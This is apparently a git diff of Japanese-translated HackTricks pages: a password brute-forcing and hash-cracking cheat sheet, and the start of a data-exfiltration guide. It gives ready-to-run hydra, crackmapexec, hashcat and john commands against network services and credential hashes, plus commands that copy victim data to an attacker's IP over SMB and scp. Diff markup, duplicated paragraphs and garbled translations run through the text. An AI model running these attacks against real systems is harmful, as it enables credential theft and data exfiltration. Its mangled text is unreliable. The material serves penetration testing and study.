Rloginは、ユーザー名とパスワードの組み合わせを総当たりで試すために使用されることがあります。Brute force攻撃を行う際には、ツールを使用して自動的に異なる組み合わせを試すことができます。
Rloginは、ユーザー名とパスワードの組み合わせを総当たりで試すために使用されることがあります。Brute force攻撃を行う際には、ユーザー名のリストとパスワードのリストを使用して、自動化ツールを使ってRloginサービスに対して総当たり攻撃を行います。
```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```
### Rsh
#### Brute Force
Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually very time-consuming and resource-intensive, but it can be effective against weak passwords or encryption keys.
#### Tools
There are several tools available for performing brute force attacks, such as Hydra, Medusa, and Ncrack. These tools allow attackers to automate the process of trying different combinations of keys or passwords until the correct one is discovered.
#### Prevention
To prevent brute force attacks, it is essential to use strong and complex passwords or encryption keys. Additionally, implementing account lockout policies after a certain number of failed login attempts can help mitigate the risk of a successful brute force attack.
Rshリモートシェルは、ユーザー名とパスワードの組み合わせを総当たりで試すために使用されることがあります。Brute-force攻撃によって、システムにアクセスするための正しい認証情報を見つけることができます。
```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```
@ -415,7 +407,7 @@ hydra -l root -P passwords.txt <IP> rtsp
```
### SFTP
SFTPSSH File Transfer Protocolは、SSHプロトコルを使用してファイルを安全に転送するためのプロトコルです。通常、SFTPはポート22を使用して通信を行います。
SFTPSSH File Transfer Protocolは、SSHプロトコルを使用してファイルを安全に転送するためのプロトコルです。 SFTPは、ファイル転送中にデータを暗号化し、セキュリティを強化します。
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
@ -423,7 +415,7 @@ legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --tar
```
### SNMP
SNMPSimple Network Management Protocolは、ネットワークデバイスの監視や管理に使用されるプロトコルです。 SNMPのバージョン1および2は、コミュニティ文字列を使用してデバイスにアクセスします。これにより、Brute Force攻撃を使用してコミュニティ文字列を推測することができます。
SNMPSimple Network Management Protocolは、ネットワークデバイスの監視や管理に使用されるプロトコルです。 SNMPのバージョン1および2は、コミュニティ文字列を使用してデバイスにアクセスします。これは、Brute Force攻撃に対して脆弱なセキュリティ構成を持っているため、適切なセキュリティ対策が必要です。
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
@ -440,7 +432,7 @@ legba smb --target share.company.com --username admin --password data/passwords.
```
### SMTP
Simple Mail Transfer ProtocolSMTPは、電子メールを送信するために使用される標準プロトコルです。SMTPサーバーへのアクセスを狙ったBrute Force攻撃は、一般的な手法の1つです。Brute Force攻撃では、辞書攻撃やランダムなパスワードの組み合わせを使用して、SMTPサーバーにログインするための正しい認証情報を見つけようとします。
Simple Mail Transfer Protocol (SMTP)は、電子メールを送信するために使用される標準プロトコルです。通常、25番ポートを使用しており、メールサーバーとクライアント間でメールを送受信する際に使用されます。SMTPサーバーへのBrute Force攻撃は、自動化されたツールを使用して、パスワードを推測し、不正アクセスを試みる手法です。
```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
@ -448,7 +440,7 @@ legba smtp --username admin@example.com --password wordlists/passwords.txt --tar
```
### SOCKS
SOCKSSocket Secureは、ネットワークソケットを通じて通信するためのプロキシプロトコルです。通常、SOCKSプロキシを使用して、ネットワーク上の別のホストに接続する際に、通信を中継するために使用されます。SOCKSプロトコルは、TCP接続やDNSの解決など、さまざまなネットワークプロトコルをサポートしています。
SOCKSは、ネットワークプロトコルであり、通常、TCP接続を介してトラフィックを中継するために使用されます。SOCKSプロトコルは、プロキシサーバーを介して通信を中継するために使用され、通常、ネットワーク内の別の場所にあるサーバーに接続するために使用されます。SOCKSプロトコルは、ユーザーがファイアウォールをバイパスし、インターネット上のリソースにアクセスするのに役立ちます。
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
@ -457,7 +449,7 @@ legba socks5 --target localhost:1080 --username admin --password data/passwords.
```
### SQL Server
SQL Serverは、Microsoftが開発したリレーショナルデータベース管理システムです。SQL ServerへのBrute Force攻撃は、一般的にユーザー名とパスワードの組み合わせを継続的に試行することで行われます。攻撃者は、自動化ツールを使用して大量の認証試行を行い、正しい認証情報を見つけようとします。SQL ServerへのBrute Force攻撃は、適切なセキュリティ対策が講じられていない場合に成功する可能性があります。
SQL Serverは、Microsoftが開発したリレーショナルデータベース管理システムです。SQL ServerへのBrute Force攻撃は、一般的にユーザー名とパスワードの組み合わせを総当たりで試行することによって行われます。攻撃者は、自動化ツールを使用して大量の認証試行を行い、正しい認証情報を見つけようとします。これにより、不正アクセスが可能になります。SQL ServerへのBrute Force攻撃からデータを保護するためには、強力なパスワードポリシーを実装し、アカウントロックアウト機能を有効にすることが重要です。
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
@ -478,13 +470,13 @@ legba ssh --username admin --password wordlists/passwords.txt --target localhost
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
#### 弱いSSHキー / Debian予測可能PRNG
#### 弱いSSHキー / Debian予測可能PRNG
一部のシステムには、暗号資料を生成するために使用されるランダムシードに既知の欠陥があります。これにより、劇的に減少したキースペースが生じ、[snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute)などのツールでブルートフォース攻撃される可能性があります。[g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)などの事前生成された弱いキーのセットも利用可能です。
一部のシステムには、暗号資料を生成する際に使用されるランダムシードに既知の欠陥があります。これにより、鍵空間が著しく減少し、[snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute)などのツールでブルートフォース攻撃が可能になります。[g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)のような事前生成された弱いキーのセットも利用可能です。
### STOMP (ActiveMQ、RabbitMQ、HornetQ、およびOpenMQ)
STOMPテキストプロトコルを使用すると、ActiveMQ、RabbitMQ、HornetQ、およびOpenMQなどのメッセージキューイングサービスとやり取りできます。
STOMPテキストプロトコルは、RabbitMQ、ActiveMQ、HornetQ、およびOpenMQなどの人気のあるメッセージキューイングサービスとのシームレスな通信とやり取りを可能にする広く使用されているメッセージングプロトコルです。これは、メッセージの交換やさまざまなメッセージング操作を効率的かつ標準化された方法で実行するための手段を提供します。
```bash
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
```
@ -524,14 +516,14 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```
### Winrm
WinrmはWindows Remote Managementの略で、Windowsシステムをリモートで管理するためのプロトコルです。Winrmは、ユーザー名とパスワードの組み合わせを使用して認証を行います。Brute force攻撃を使用して、複数のユーザー名とパスワードの組み合わせを試すことでWinrmにアクセスすることができます。
WinrmはWindows Remote Managementの略で、Windowsシステムをリモートで管理するためのプロトコルです。Winrmは、Windowsシステムへのアクセスを可能にするために使用され、様々なツールやスクリプトからリモートでコマンドを実行することができます。
```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフロー**を簡単に構築し、**自動化**できます。\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**し**自動化**します。\
今すぐアクセスしてください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -552,7 +544,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
ハッシュをブルートフォース攻撃する前にこれをチェックしてください。
ハッシュをブルートフォースする前にこれをチェックしてください。
### ZIP
```bash
@ -572,7 +564,7 @@ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
```
#### 既知の平文zip攻撃
暗号化されたzipファイルの中に含まれるファイルの**平文**(または平文の一部)を知る必要があります。 暗号化されたzipファイルに含まれるファイルの**ファイル名とサイズを確認**するには、次のコマンドを実行します:**`7z l encrypted.zip`**\
暗号化されたzipファイルの中に含まれるファイルの**平文(または平文の一部)を知る必要があります。** 暗号化されたzipファイルに含まれるファイルの**ファイル名とサイズを確認するには、**`7z l encrypted.zip`**を実行します。\
[**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)をリリースページからダウンロードしてください。
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
@ -587,7 +579,7 @@ unzip unlocked.zip #User new_pwd as password
```
### 7z
### 7z
7zは、強力な圧縮および解凍ツールです。Brute-force攻撃を使用して、パスワード保護された7zファイルのパスワードを解読することができます。Brute-force攻撃は、すべての可能な組み合わせを試行し、正しいパスワードを見つける方法です。
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
@ -600,7 +592,7 @@ apt-get install libcompress-raw-lzma-perl
```
### PDF
PDFファイルは、一般的にパスワードで保護されており、Brute Force攻撃を使用して解読することができます。Brute Force攻撃は、すべての可能な組み合わせのパスワードを試行し、正しいパスワードを見つける攻撃手法です。これにより、PDFファイルのパスワードを解読することが可能となります。
PDFファイルは、一般的にパスワードで保護されており、Brute Force攻撃を使用してアクセスできます。Brute Force攻撃は、すべての可能なパスワードの組み合わせを試行し、正しいパスワードを見つける方法です。これにより、PDFファイルの保護を解除し、内容にアクセスできる可能性があります。
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
@ -611,7 +603,7 @@ qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```
### PDFオーナーパスワード
PDFオーナーパスワードを解読するには、[こちら](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)を参照してください。
PDFオーナーパスワードを解読するには、こちらを参照してください: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
### JWT
```bash
@ -625,14 +617,12 @@ python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
### NTLM クラック
### NTLMクラッキング
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
### Keepass
### Keepass
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
@ -643,7 +633,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
### Keberoasting
Keberoastingは、Active DirectoryのKerberosサービスチケットを攻撃する手法です。攻撃者は、Kerberosサービスチケットを取得し、それをオフラインで解読することで、有効なユーザーアカウントの資格情報を取得します。 Keberoastingは、攻撃者がActive Directory環境内で権限を昇格させるのに役立ちます。
### ケベロス攻撃
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
@ -688,14 +678,14 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
### DPAPI Master Key
[https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py)を使用して、次にjohnを使用します
[https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py)を使用し、その後johnを使用します
### Open Office Pwd Protected Column
パスワードで保護された列を持つxlsxファイルがある場合、それを解除できます
* **Googleドライブにアップロード**して、パスワードが自動的に削除されます
* **手動で**それを**削除するには**
* **手動で**それを**削除**するには:
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
@ -714,7 +704,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築****自動化**します。\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスしてください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -723,7 +713,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
**ハッシュの例:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
### ハッシュ識別
### ハッシュ識別
```bash
hash-identifier
> <HASH>
@ -743,7 +733,7 @@ kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction
```
### Johnの変異
_**/etc/john/john.conf**_を読み、それを設定します
_**/etc/john/john.conf**_を読み、それを設定します
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
@ -752,7 +742,7 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
#### Hashcat攻撃
- **ワードリスト攻撃** (`-a 0`) with rules
* **ワードリスト攻撃** (`-a 0`) with rules
**Hashcat** にはすでに**ルールを含むフォルダ**が付属していますが、[**こちらで他の興味深いルールを見つけることができます**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules)。
```
@ -761,7 +751,7 @@ hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
* **ワードリスト組み合わせ**攻撃
hashcatを使用して、2つのワードリストを1つに**組み合わせる**ことが可能です。\
リスト1に単語**"hello"**が含まれ、2番目には単語**"world"**と**"earth"**が含まれる場合、`helloworld`と`helloearth`が生成されます。
リスト1に単語**"hello"**が含まれ、2番目には単語**"world"**と**"earth"**が含まれている場合、`helloworld`と`helloearth`という単語が生成されます。
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
@ -818,25 +808,29 @@ hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
## Brute Forcing
Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the `/etc/shadow` file, brute forcing involves generating potential passwords and hashing them using the same algorithm and salt as the target hash. These generated hashes are then compared with the target hash to find a match.
Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. When it comes to cracking Linux hashes from the `/etc/shadow` file, brute forcing can be a powerful method if the passwords are not strong enough.
### Tools and Resources
### Tools
There are various tools and resources available for brute forcing passwords, such as:
There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools can be used to automate the process of trying different password combinations against the hashed passwords in the `/etc/shadow` file.
- **John the Ripper**: A popular password cracking tool that can perform brute force attacks among other techniques.
- **Hashcat**: Another powerful tool for password cracking that supports multiple hashing algorithms.
- **Crunch**: A tool used to generate custom wordlists for brute forcing attacks.
- **Rainbow Tables**: Precomputed tables used to accelerate the cracking of password hashes.
### Methodology
### Best Practices
1. **Obtain the Hashes**: First, you need to obtain the hashed passwords from the `/etc/shadow` file on the target Linux system.
When performing brute force attacks, it is important to consider the following best practices:
2. **Choose a Tool**: Select a suitable password cracking tool based on your requirements and the type of hashes you are dealing with.
- **Use a strong wordlist**: The quality of the wordlist used can significantly impact the success of the brute force attack.
- **Utilize rules**: Many password cracking tools support rule-based attacks, which can help generate variations of words in the wordlist.
- **Optimize attack parameters**: Adjusting parameters such as password length, character set, and concurrency can improve the efficiency of the brute force attack.
- **Stay within legal boundaries**: Ensure that you have the necessary permissions before conducting brute force attacks, as unauthorized access is illegal and unethical.
3. **Configure the Tool**: Set up the chosen tool to start the brute force attack. This may involve specifying the hash type, character set, password length, and other parameters.
4. **Start Brute Forcing**: Initiate the brute force attack using the tool, which will systematically try different password combinations until the correct one is found.
5. **Crack the Password**: Once the tool successfully cracks a password, you will have the plaintext password that corresponds to the hashed password in the `/etc/shadow` file.
### Considerations
- **Time**: Brute forcing can be a time-consuming process, especially for complex passwords.
- **Resources**: The success of brute forcing depends on the computational resources available and the complexity of the passwords.
- **Legality**: Ensure that you have the necessary permissions before attempting to crack passwords using brute force techniques.
```
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
@ -851,39 +845,46 @@ When it comes to cracking Windows hashes, one of the most common methods is brut
### Tools for Brute Forcing Windows Hashes
There are several tools available for brute forcing Windows hashes, including **John the Ripper**, **Hashcat**, and **CrackMapExec**. These tools are widely used by hackers and security professionals to crack passwords and gain unauthorized access to Windows systems.
There are several tools available for brute forcing Windows hashes, including **John the Ripper**, **Hashcat**, and **Hydra**. These tools are capable of running through large wordlists and trying different combinations of characters to crack the hash.
### Brute Forcing with John the Ripper
### Methodology
**John the Ripper** is a popular password cracking tool that can be used to perform brute force attacks on Windows hashes. It supports various hash types, including NTLM, LM, and others. To use John the Ripper for brute forcing Windows hashes, you can run the following command:
To brute force a Windows hash, you first need to obtain the hash itself. This can be done by extracting the hash from the Windows system or by using tools like **Mimikatz** to dump the hashes from memory.
```bash
john --format=NT --wordlist=wordlist.txt hashes.txt
```
Once you have the hash, you can use a tool like **John the Ripper** to run a brute force attack. John the Ripper allows you to specify the character set, minimum and maximum password length, and other parameters to customize the attack.
In this command, `--format=NT` specifies the hash type as NTLM, `--wordlist=wordlist.txt` specifies the wordlist to use for the brute force attack, and `hashes.txt` is the file containing the Windows hashes.
Another popular tool for brute forcing Windows hashes is **Hashcat**. Hashcat supports multiple hashing algorithms and can be highly optimized for speed, making it a powerful tool for cracking hashes.
### Conclusion
Brute forcing Windows hashes can be a time-consuming process, especially if the password is complex. However, with the right tools and techniques, it is possible to crack Windows hashes and gain access to sensitive information stored on Windows systems.
Brute forcing Windows hashes can be a time-consuming process, especially for complex passwords. However, with the right tools and techniques, it is possible to crack Windows hashes and gain access to the system. It is important to use these techniques responsibly and only on systems that you have permission to test.
```
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
## Brute-Force
## Brute Force
Brute-force attacks are a common method used to crack hashes. This technique involves trying all possible combinations of characters until the correct one is found. Brute-forcing can be time-consuming and resource-intensive, but it is effective against weak passwords. There are tools available that can automate the brute-forcing process, such as John the Ripper and Hashcat.
Brute force attacks are a common way to crack hashes. This method involves trying all possible combinations of characters until the correct one is found. Brute force attacks can be time-consuming but are effective, especially for simpler passwords. There are tools available that can automate the brute force process, such as John the Ripper and Hashcat.
### Steps to Brute-Force a Hash:
### Using John the Ripper
1. **Capture the Hash**: Obtain the hash that you want to crack.
2. **Select a Tool**: Choose a suitable tool for brute-forcing, such as John the Ripper.
3. **Set Up the Tool**: Configure the tool with the necessary parameters, such as character set and password length.
4. **Initiate the Attack**: Start the brute-force attack and let the tool try all possible combinations.
5. **Monitor Progress**: Keep an eye on the progress of the attack to see if the correct password is found.
6. **Crack the Hash**: Once the correct password is discovered, the hash is considered cracked.
To use John the Ripper for brute force attacks, you can run the following command:
By following these steps, you can effectively brute-force common application hashes and gain unauthorized access to systems.
```bash
john --format=FORMAT hash.txt
```
Replace `FORMAT` with the hash type you are trying to crack, and `hash.txt` with the file containing the hash you want to crack.
### Using Hashcat
Hashcat is another powerful tool for brute force attacks. You can use Hashcat with the following command:
```bash
hashcat -m FORMAT hash.txt wordlist.txt
```
Replace `FORMAT` with the hash type and `wordlist.txt` with the file containing the wordlist you want to use for the brute force attack.
```
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
@ -897,20 +898,20 @@ By following these steps, you can effectively brute-force common application has
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
* **ハッキングトリックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリに提出する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見す
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする**
* **ハッキングトリックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github リポジトリに提出する
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) を使用して、世界で最も高度なコミュニティツールによって強化された **ワークフローを簡単に構築** および **自動化** してください。\
今すぐアクセスしてください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

102
generic-methodologies-and-resources/exfiltration.md
View file

@ -6,27 +6,27 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする**
* **ハッキングテクニックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のgithubリポジトリに提出してください。**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正を迅速化します。Intruder は攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて、迅速に修正できるようにします。Intruder は攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## 情報を外部に持ち出すための一般的にホワイトリストに登録されているドメイン
## 情報の外部への持ち出しによくホワイトリストされるドメイン
Misskey で濫用される可能性のある一般的にホワイトリストに登録されているドメインを見つけるには、[https://lots-project.com/](https://lots-project.com/) をチェックしてください
Misskey される可能性のある一般的なホワイトリストされたドメインを見つけるには、[https://lots-project.com/](https://lots-project.com/) をチェックしてください
## Base64 コピー&ペースト
## Base64 コピー&ペースト
**Linux**
```bash
@ -163,7 +163,7 @@ ftp -n -v -s:ftp.txt
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて、より速く修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -195,28 +195,21 @@ service smbd restart
```
## Exfiltration
### Exfiltration Techniques
### Exfiltration Over Command and Control Channel
Exfiltration techniques are used to **steal** data from a target network. Once an attacker has gained access to a network, they will often need to exfiltrate data without being detected. There are several common exfiltration techniques:
Exfiltration over the command and control (C2) channel is a common technique used by attackers to steal data from compromised systems. This method involves sending the exfiltrated data to a remote server controlled by the attacker. The data can be encrypted to avoid detection by security tools.
- **Compression**: Data is compressed before exfiltration to reduce its size and avoid detection.
- **Encryption**: Data is encrypted to prevent detection by security tools.
- **Steganography**: Data is hidden within other files to avoid detection.
- **Traffic manipulation**: Attackers manipulate network traffic to exfiltrate data without being detected.
- **DNS tunneling**: Data is exfiltrated using DNS requests to avoid detection.
### Exfiltration Over Alternative Protocols
### Exfiltration Tools
Attackers may also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTPS. By disguising the exfiltrated data as legitimate traffic over these protocols, attackers can bypass network security measures.
There are several tools available to help with data exfiltration:
### Exfiltration Over Encrypted Channels
- **Netcat**: A versatile networking utility that can be used for data transfer.
- **Wget**: A command-line utility for downloading files.
- **Curl**: Another command-line utility for transferring data with URLs.
- **FTP**: File Transfer Protocol can be used to exfiltrate data to an external server.
- **SCP**: Secure Copy Protocol can securely transfer files between hosts.
- **Rsync**: A utility for efficiently transferring and synchronizing files between systems.
Exfiltrating data over encrypted channels such as SSL/TLS can help attackers avoid detection by encrypting the exfiltrated data in transit. This method makes it harder for security tools to inspect the data being exfiltrated.
By using these exfiltration techniques and tools, attackers can successfully steal data from a target network without being detected.
### Exfiltration Using Steganography
Steganography is the technique of hiding data within other files to avoid detection. Attackers can use steganography to exfiltrate data by embedding it within images, audio files, or other seemingly innocuous files. This method can be difficult to detect without specialized tools.
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
@ -232,7 +225,7 @@ scp <username>@<Attacker_IP>:<directory>/<filename>
```
## SSHFS
被害者がSSHを持っている場合、攻撃者は被害者から攻撃者にディレクトリをマウントできます。
被害者がSSHを持っている場合、攻撃者は被害者から攻撃者にディレクトリをマウントすることができます。
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
@ -240,31 +233,7 @@ sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP addre
```
## NC
### Data Exfiltration
#### Description
The `nc` command, short for netcat, is a versatile tool that can be used for data exfiltration. It allows for reading and writing data across network connections, making it a valuable asset during a penetration test.
#### Usage
To exfiltrate data using `nc`, you can set up a listener on the receiving end and send data from the target machine to the listener. Here is an example of how to send a file using `nc`:
On the receiving end:
